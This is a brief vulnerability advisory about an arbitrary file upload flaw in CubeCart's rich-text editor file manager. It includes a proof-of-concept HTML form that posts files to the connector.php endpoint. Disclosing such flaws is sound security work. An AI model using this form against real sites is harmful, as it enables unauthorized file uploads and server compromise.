|
|
CubeCart Arbitrary File Upload Vulnerability
This issue can be exploited with a web client. The following proof of concept is available: <form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol der=/" method="POST" enctype="multipart/form-data"> File Upload<br> <input id="txtFileUpload" type="file" name="NewFile"> <br> <input type="submit" value="Upload"> </form> |
|
Privacy Statement |